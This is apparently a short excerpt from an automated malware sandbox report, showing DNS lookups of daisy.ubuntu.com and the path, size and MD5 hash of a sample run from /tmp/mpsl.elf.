    Apr 2, 2025 10:53:21.085181952 CEST192.168.2.131.1.1.10xfb09Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
    Apr 2, 2025 10:53:21.085182905 CEST192.168.2.131.1.1.10x1d1eStandard query (0)daisy.ubuntu.com28IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Apr 2, 2025 10:53:21.184504986 CEST1.1.1.1192.168.2.130xfb09No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
    Apr 2, 2025 10:53:21.184504986 CEST1.1.1.1192.168.2.130xfb09No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

    System Behavior

    Start time (UTC):08:53:19
    Start date (UTC):02/04/2025
    Path:/tmp/mpsl.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9